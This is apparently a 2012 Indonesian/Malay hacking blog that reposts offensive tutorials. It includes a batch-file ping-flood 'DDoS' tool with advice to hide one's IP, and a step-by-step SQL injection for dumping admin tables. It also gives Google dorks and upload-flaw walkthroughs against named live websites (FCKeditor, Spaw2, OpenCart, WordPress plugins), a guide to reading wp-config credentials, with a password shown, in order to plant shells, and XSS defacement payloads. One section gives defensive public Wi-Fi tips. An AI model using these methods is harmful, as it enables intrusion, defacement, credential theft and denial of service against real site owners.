Rabu, 04 April 2012

PHP Flooder Tested by Ze Cor

Buat kmu yg udah punya bnyak hosting ato punya shell di hosting2 yg buanyaks

Bisa dipaki buat Flood nie ane tulis PHP floodernya, jgn dipake yg gak bener ya, ato dipake nyerang we yg nulis nie janji..?? okay ane anggap kmu kmu setuju ma we ;) we are brother


Exploit Untuk Wordpress

Wordpress Exploit ;)

timthumb php file inclusion

wp-content/plugins/category-grid-view-gallery/includes/timthumb.php

AllWebMenus WordPress Menu Plugin

wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php

Count per Day

wp-content/plugins/count-per-day/map/map.php

Whois Search Plugin

wp-content/plugins/wordpress-whois-search/vendors/samswhois/samswhois.inc.php

WP Symposium A Social Network For WordPress


OneFileCMS v.1.1.5 Local File Inclusion Vulnerability

# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
# Google Dork: --
# Date: 16/03/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Software Link: https://github.com/rocktronica/OneFileCMS
# Version: OneFileCMS v.1.1.5
# Tested on: Linux Fedora 14
===============
Description
===============

Encaps PHP Gallery SQL Injection

# Exploit Title: Encaps PHP Gallery SQL Injection
# Date: 14/03/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Encaps PHP Gallery
# http://www.encaps.net/software/encapsgallery/
# Tested on: Linux
# Dork: "shopcart.php?action=add&item_id="

DirectAdmin ADD Sub Domain CSRF Exploit

#!/usr/bin/perl
########################################################################
# Title    : DirectAdmin Web Control Panel � 2005 JBMC Software
# Author   : Onur T�RKE�HAN
# Homepage : http://www.directadmin.com/
# tested on : Windows 7
# Seni Unutmayacagiz MIRIM-

Webdav vulnerability google dork

Google dork:

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache"

or

intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:edu

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:gov

or intitle:"index.of" intext:"(Win32) DAV/2" intext:"Apache" site:YOURCOUNTRY

Just add the /webdav extension to the URL if you found "WebDAV testpage"

So go ahead it's Webdav vulnerability hackable :)

Example:

http://www.hebron.edu/webdav/
http://www.jcjc.edu/webdav/
http://archnet.asu.edu/webdav/
http://mvl.mit.edu/webdav/
http://www.engl.niu.edu/webdav/
http://www.mstc.edu/webdav/

Enjoy.
©2011, copyright BLACK BURN

Awas! Bahaya Wifi Percuma

Mungkin ramai yang suka atau sering online facebook, twitter, email dan sebagainya di tempat awam yang menyediakan kemudahan internet atau wifi percuma terutamanya di kolej, kedai-kedai makan, pusat membeli belah dan sebagainya. Tapi tahukah anda online di tempat terbuka sebenarnya berisiko tinggi untuk di hack?

Ya betul, online di tempat terbuka memang memudahkan akaun anda di godam oleh pihak yang tidak bertanggungjawab menggunakan kaedah Rampasan Sesi atau Session Hijacking dengan menggunakan Firesheep iaitu add on yang di buat untuk browser Mozilla Firefox.

Dengan teknik ini, pengodam dengan mudah dapat mencuri cookies iaitu data lengkap tentang akaun seseorang yang terdapat dalam komputer/ laptop pemangsa. Ianya memang mudah bagi yang pakar.. ekeke, apabila dapat cookies atau data ni, pengodam hanya terus masuk ke akaun pemangsa tanpa perlu log in, bahaya bukan? bagaimana dengan urusan perbankan? memang bahaya.


Jadi antara tips-tips yang boleh diberi:-

1. Jangan log masuk atau online dekat wifi percuma yang pelik- pelik di kawasan perumahan yang tidak diketahui datang dari mana.

2. Kalau dah selesai urusan di internet, cepat-cepat log keluar dan clear history dan cookies.

3. Jangan log in di mana – mana laman web yang tidak mempunyai https dalam url laman web nya. (Dikatakan laman web yang menggunakan https lebih selamat daripada rampasan sesi Session Hijacking.

4. Nak selamat, jangan buat urusan perbankan seperti maybank2u, cimb click di tempat awam dan di cyber cafe juga..


p/s: macam-macam cara atau teknik sekarang ni, hati-hati yer

Sumber : https://www.facebook.com/groups/NuhibbuQittun.KamiSayangKucing

DDoS Attack

DDos Attack ~

Assalamualaikum semua....hari ini aku nak ajar cara nak DDoS.Sekarang nih dah bnyak tools untuk DDoS nih.cContohnya seperti LOIC,HOIC,Server Attacker dll....tapi hari ini kita akan DDoS menggunakan tool yg simple.Tool ni korang kene buad seniri.hehe...



Oh sebelum terlupa anda perlu menyembunyikan IP ADDRESS anda terlebih dahulu.atau anda akan tertangkap.anda boleh menggunakan apa2 tools sekali pun seperti Platinum IP Hide atau tool lain.


Download : Platinum Hide IP



Baiklah tool simple ni sebenarnya korang bole buat hanya dngan menggunakan notepad sahaja.Betul tu...NOTEPAD!ok jom mula...


LANGKAH 1 :
Copy code2 dibawah ini :




@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS




LANGKAH 2 :



Buka application notepad,paste-kan code2 tadi.


LANGKAH 3 :


Save file anda seperti dibawah :



File Name : DDoS Attack.bat
Save As Type : All File <--- PENTING


note: file name tu nak letak nama lain pun bole.pastikan format .bat



OK SIAP!!


Cara-cara menggunakannya :


1. Double click file anda itu.


2. Akan tertera : Server-Target:



Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.


Contoh :
Sebelum              = http://www.google.com/
Tukarkan kepada = www.google.com

Setelah memasukkan url itu, tekan enter.





3. Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.
Setelah selesai ping, akan keluar seperti ini :



Pinging www.l.google.com [209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56


Ping statistics for 209.85.175.106:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 24ms, Maximum = 40ms, Average = 32ms



209.85.175.106 <----- IP address bagi www.google.com
Caranya sama jugak untuk website lain.





4. Selepas itu, akan terpapar di tool itu :  ip Host:



Masukkan saja ip address yg anda dapat tadi.
Contoh :


ip Host:209.85.175.106


dan tekan enter.



5. Akhir sekali akan keluar pula :  Packet Size :


Letakkan berapa bnyak yg anda mahu.lagi banyak lagi POWER!lol
Contoh :


Packet Size : 10000000


Dan tekan enter.


6. Akan terpapar : Attacking Server.....
Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

credit too:sape2 yang nak blaja =)

Sumber : https://www.facebook.com/groups/NuhibbuQittun.KamiSayangKucing

My SQL Injection Step by Step

Pengertian sql injection:SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:karakter: ' atau -comments: /* atau --information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

============step Satu:============

carilah targetmisal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.contoh:[site]/berita.php?id=100' atau[site]/berita.php?id=-100ehingga muncul pesan error seperti berikut (masih bnyak lagi):


===========step Dua:===========

mencari dan menghitung jumlah table yang ada dalam databasenya...gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...misal:


[site]/berita.php?id=-100+order+by+1--[site]/berita.php?id=-100+order+by+2--[site]/berita.php?id=-100+order+by+3--[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8menjadi [site]/berita.php?id=-100+order+by+8--


============step Tiga:============

untuk mengeluarkan angka berapa yang muncul gunakan perintah unionkarena tadi error sampai angka 9maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadimisal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


=============step Empat:=============

untuk menampilkan table yg ada pada web tsb adalahperintah table_name >>> dimasukan pada angka yg keluar tadiperintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


============step Lima:============

untuk menampilkan semua isi dari table tsb adalahperintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadiperintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir


[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

============== step Enam: ==============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadiperintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir


[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinyawebsite yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E


[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--

=============step Tujuh:=============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadiperintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

=============== step Delapan:===============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka

Sumber : https://www.facebook.com/groups/typicore

FCKeditor Versi 2.4.3

Google Drok:
- FCKeditor_2.4.3/FCKeditor/editor/filemanager
*Up to you (use your imagine)

Then follow step by step, and open dir upload file :D
Fckeditor 2.4.3 not accept file html, php, asp, etc.
Just accept file txt, etc :'(

Live Target For you:
- http://www.chasinglove.com.tw/FCKeditor_2.4.3/FCKeditor/editor/filemanager/upload/test.html


hasil :
http://www.chasinglove.com.tw/fckeditor_uploads/Image/attaced.txt

Sumber : https://www.facebook.com/groups/typicore

MySQL Jumping

jika kita menemukan disuatu web seperti
[Found !] /home/k1805540/public_html/
[Found !] /home/k6952005/public_html/
[Found !] /home/k0646149/public_html/
[Found !] /home/k5308037/public_html/
[Found !] /home/k0614648/public_html/
[Found !] /home/k9419741/public_html/
[Found !] /home/k1786232/public_html/
[Found !] /home/k8626869/public_html/
[Found !] /home/k4745546/public_html/
[Found !] /home/k4455610/public_html/
[Found !] /home/k9220608/public_html/
[Found !] /home/k2513476/public_html/
[Found !] /home/k0683266/public_html/
[Found !] /home/k3868739/public_html/
[Found !] /home/k5908158/public_html/
[Found !] /home/k2523618/public_html/
[Found !] /home/k5418528/public_html/

kita coba 1 / 1

copas salah satu dari yg di atas , klik 'view'

kalau sudah  ?

coba cari
cari file config
configuration.php (joomla)
wp-config(wordpress)

saya ngambil contoh yg wordpress.
klik..

nanti klian mendapat user + password nya
contoh "
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'k5308037_wrdp1');

/** MySQL database username */
define('DB_USER', 'k5308037_wrdp1');

/** MySQL database password */
define('DB_PASSWORD', '9pMDnrv2BFo9');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

 sekarang . Masuk ke 'MySQL'

masuk ke Wp_user

klik admin -> edit
ganti password sesuka hati kalian..

lalu ke Wp_option -> disitu ada link web nya,,

copas..
misal http://site.com/wp-login.php

lalu login..
setelah itu , pasang shell di web tersebut,,
lalu hajar deh sesuka mu :))

Sumber : https://www.facebook.com/groups/typicore

Bypass shell Defacing web Wordpress type

Deface Website Type Worspress Maaf sebelum nya bila tutorial ini , ada aja pihak-pihak yang di rugikan, tapi dengan tutorial ini mungkin kita bsa ambil hikmah nya,buat para mastah izin post yah, hitung-hitung buat pembelajaran bagi temen temen yang mau belajar tentunya...lanjouttt.
Okey first step atau langkah pertama
langkah pertama yang harus brade lakukan jika ingin pepes website khusus nya type wordpress ,yaitu dengan terlebih dahulu menganalisa web tersebut(lebih bagus lagi jika anda sudah pernah menggunakanya offline pada localhost misalnya) Dengan ini setidak nya anda sudah tau struktur folder yang ada dalam host tersebut.
setelah anda menganalisa web tersebut perhatikan fitur yang ditawarkan web type worpress tersebut apa aja sehingga anda tau mengambil langkah apa dan dari mana dan dengan cara apa kita bsa masuk dan Upload PHP sell  kita yg sudah ready tentunya.
okey … sekarang setelah saya coba menganalisa salah satu web type wordpress (sebagai bahan praktek kita coba yang ini aja gk usah jauh jauh ex:http://www.bekasiindependen.com) setelah muter-muter seputar ini web saya menemukan celah di bagian ini : Plugin EasyComment Upload
plugins/easy-comment-uploads/upload-form.php
ini bug tidak bisa saya jelaskan sekarang , bagaimana dan apa ??(butuh satu thread untuk menjelaskan about ne bug) intinya bug ini memang sudah ada disediakan oleh Devloper wordpress (buat para admin yg memakai wordpress coba direnungkan) nah sekarang setelah bug nya udah dapat , coba kita susup via bug tadi dengan cara pada adress bar browser anda ketikkan seperti:
http://[localhost]/wp-content/easy-comment-uploads/upload-form.php (localhost diganti dengan alamat site target) jika ada pact nya masukkan eksploit sesudah patch seperti ini:
http://[localhost]/[path]/wp-content/easy-comment-uploads/upload-form.php
conto yang saya praktekan dulu, pada adress bar browser ketik seperti ini :
http://www.bekasiindependen.com/wp-content/plugins/easy-comment-uploads/upload-form.php
enter dan….hemmm maka akan muncul window seperti gmbr berikut:

Contoh gambarnya => https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-OiYdjdSlzv2GJ8o5dWeCD5XFHrzWFf4Jwql0DWVkbjPSvBIaLBupXLElNW0QFFdpTtCmvKlsD253ppEt59eFuOiSuS_JOf9Q7jFySqhg-RjojYem07NQK64eWVfIjilnbxKzR29MKLI/s320/brows.png

brows pada direktori anda pilih sell.php anda dan tunggu beberapa saat hingga proses loading slesai
note*: tombol upload memang tidak ada saat anda select file itu dah auto upload kok. selanjut nya mari kita lihat file kita tadi … lihat di bagian ini
http://www.bekasiindependen.com/wp-content/uploads/2011/07/nama file anda
sekarang apa ??? shell.php sudah slesai upload tinggal kreativitas anda selanjut nya .(*note) jangan terlalu terpatok pada tutorial yang saya buat … kemungkinan website sudah di patch tapi bisa kok anda kembangkan lagi semua tergantung kreaativitas anda. untuk melihat hasil nya berikut priview sampel yang dulu saya praktekkan dan membuat saya bingung ne admin web kmana kok ini file masih ada

http://www.bekasiindependen.com/emd5.php
Mengapa security test by md5coder karena nie post saya import dari blog saya yang satu lagi berhubung ini lebih seo makanya saya import kesini dulunya ini saya post di blog saya yang www.emd5coder.blogspot.com  
Untuk skala besar anda bisa pake dork ini,buka google paste dork berikut silahkan dan selamat berdeface.
Dork : “inurl:easy-comment-uploads/upload-form.php”

Sumber : https://www.facebook.com/groups/typicore

Spaw2 Upload Vulnerability

google dork : inurl:"spaw2/uploads/files/"

setelah mencari kesana kemari misalnya kita udah dpt target..

example :



Code:
http://www.linx-lmn.ro

gimana lagi nih? okeh..

ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

sehingga menjadi http://www.linx-lmn.ro/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

hmm gimana buat upload file deface kita? begini

klik pilihan "images" menjadi "files"

setelah selesai klik browse lalu upload..

kalo udah di upload gimana lagi supaya muncul hasil deface kita?

lihat bagian kanan.. klik [download files] tapi lihat dulu nama file yg kita masukan apa. setelah selesai maka akan menjadi seperti ini
http://www.linx-lmn.ro/spaw2/uploads/files/bubud007.html


silahkan di explorisasi dari deface upload ini

Tekhnik Remote File Upload Opencart (Deface)

Mendeface Web dengan Remote File Upload Opencart sangatlah mudah, mengapa dikatakan mudah, karena kita tinggal mencari vuln atau kelemahan web nya saja, tanpa harus mencari “username” dan “password” admin nya.  Jadi intinya, cara kerjanya yaitu mengupload sebuah file dengan menggukanan kelemahan suatu web..

1.  Tentunya kita memerlukan Dork untuk mencari targetnya
      Dork : Powered By OpenCart site:com

2.  Setelah itu kita membutuhkan POC
     POC : admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

3.  Setelah ketemu Targetnya
     Contoh : http://www.wiretek.net/

4.  Kita Inject Exploitnya dengan POC diatas, sehingga jadinya seperti ini :
     http://wiretek.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

5.  Maka akan muncul sebuah tampilan

6.  Ganti  connectornya menjadi  dari ASP menjadi PHP

7.  Upload File Tampilan Deface kita (*.html  atau *.htm)

8.  Jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"

9.  Untuk melihat apakan berhasil di upload atau tidak kita ke "Get Folders and Files" dan lihat hasilnya.

10. Jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
      Hasil : http://www.wiretek.net/luqmanCyber.html


sumber : https://www.facebook.com/groups/typicore

Istilah-istilah Hacking

Bug -> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

Patch -> Perbaikan terhadap bug dengan mengupdate sistem yg vurnerable.

Vurnerable -> Sistem yang memiliki bug sehingga rentan terhadap serangan.

RFI (Remote File Inclusion) -> penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load

LFI (Local File Inclusion)
-> suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan) ke page yang vulnerable (vulnerable LFI maksudnya).

SQL Injection -> salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server / memasukkan (injeksi) command2 sql ke dalm query sql dlm prgram, memanipulasi query sql dlm program.

DDOS -> membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service / Distributed Denial of Service. DoS sndiri adalah serangan dgn melakukan request terus menerus pd victim dg tujuan untk mghabiskan resource pd victim,spt bandwith,memory,dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg d lakukan secara terdistribusi atau berjamaah dlm jumlah besar,biasanya menggunakan bot pd irc.

Shell ->inti dari sistem operasi.Shell mengendalikan krj sistem operasi nya.

Shell intepreter ->bentuk antarmuka yg merupakan penghubung antara shell dgn brainware. Bentuk umumnya berupa console,cmd,webshell,dll.

Deface ->merubah tampilan hlman suatu website secara illegal.

Debug ->kegiatan mencari bug pada aplikasi dan memperbaiki bug yg d temukan.

XSS -> adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.

Phising -> adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

Keylogger -> adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata).

Fake Login -> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

Fake Process -> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem. Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

Malicious Code/Script ->Kode yg dibuat untuk tujuan jahat atau biasa disebut kode jahat.

Virus -> Kode jahat yg sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yg diinfeksinya. File yg terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yg memeriksa crc32 dari dirinya.

Worm (Cacing) -> Kode jahat yg sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

Trojan (Horse) -> Kode jahat yg sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

Backdoor ->Sama sepeti Shell, pintu belakang untuk masuk ke sistem yg telah brhasil d exploitasi oleh attacker. Brtujuan untuk jalan masuk lg k sistem korban sewaktu2.

Bind ->membuka port pada kompi korban.Biasanya untuk tujuan backdooring. Bind umumnya disertai service2 yg lgsg mengakses shell.

Back connect ->mendapatkan koneksi balik or mengkonek-kan kompi korban ke kompi kita.

Port
-> Sederhananya adalah sebuah colokan, dimana colokan tersebut menyediakan layanan (service) tertentu.
Pada hardware komputer terdapat USB Port, Serial Port, Printer Port, dll.
Pada sistem operasi, port ini abstrak, tidak kelihatan seperti port2 pada hardware. Contoh: FTP Port (21), SSH Port (22), Telnet Port (23), HTTP Port (80), dll.
Ibaratnya jika kita mencolokkan kabel ke Port 80, maka kita akan mendapatkan layanan HTTP untuk dapat Browsing situs, download, dll.
Secara bahasa artinya penghubung. Port da 2 mcm:
Port fisik = penghubung antara cpu dgn hardware external. Port service = penghubung antar service/layanan pada sistem.

Flood
->membanjiri target untuk tujuan target down. Flood = DoS. Ada bnyk macam flood :
Tsunami flood = membanjiri user dgn karakter2 berat dgn jumlah banyak,berbentuk spt gelombang tsunami.Tujuanya hanya membuat user disconnected. Tsunami flood hny trjd d irc.
TCP Flood = membanjiri jalur tcp target sehingga target kehabisan bandwith pada port yg sedang d flood. Pd ddos web server, tcp flood d serangkan ke port 80 (http), sehingga menyebabkan jalur http penuh dll.

Port Scanning -> Memindai/mencari port-port yg terbuka pada suatu server.

Exploit -> Memanfaatkan bugs yg ditemukan untuk masuk kedalam sistem.

Cain & Abel
-> Program Recovery Password sekaligus Pengendus Jaringan dari Massimiliano Montoro yang bisa didownload pada http://www.oxid.it/.
Cain & Abel mudah digunakan untuk pemula karena lebih enak dilihat untuk mata pemula seperti saya. program Cain & Abel itu terdiri dari dua buah program yang terpisah.
Cain = adalah program dengan tampilan pengendus yang sebenarnya dan memang langsung dipasang saat anda selesai menginstal, dimana Abel, si adik, adalah jenis trojan yang menjadi remote console pada mesin target, dan tidak langsung diinstal karena otomatis jalan saat sang kakak (cain) di jalankan...


sumber : https://www.facebook.com/groups/typicore/
@syndrom2211

[Newbie] XSS Defacing

XSS Defacing for Blogspot or Some Website

Copy dulu script berikut ini :
<script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : Typicore XecureIT<br/>Greetz To : syndrom2211 , insyde2211 , bubud007 , and all member Typicore XecureIT <br/>Visit http://typicore-xecure.alinux.ru/";</script>

Coba buka blog orang ini : http://f4123n.blogspot.com/2009/01/pengenalan-sistem-komputer-device.html  Kemudian akan muncul messagebox, dimana kita disuruh masukin nama  Nah paste kodenya di situ & klik ok  Jreng... Jreng... Jreng...



Nah tinggal dicari dech 1000 Blog yang ada kayak begitunya



Tadi khan Blog, sekarang kita beralih ke Web, Nah gw tadi dapet beberapa Web yang Vulner XSS  Rata-rata Vulnernya di bagian "Search Enginenya", mayan khan bisa buat coba-coba XSS Defacing 

Nih contohnya : http://www.advicenow.org.uk/search.html?q=<Paste Scriptnya yang di atas Disini & Tekan Enter>



Oke silahkan ditambahkan noh, apalagi yang mengenai XSS Worm (Kalo ngartos jangan pelit2)




sumber : http://www.xcode.or.id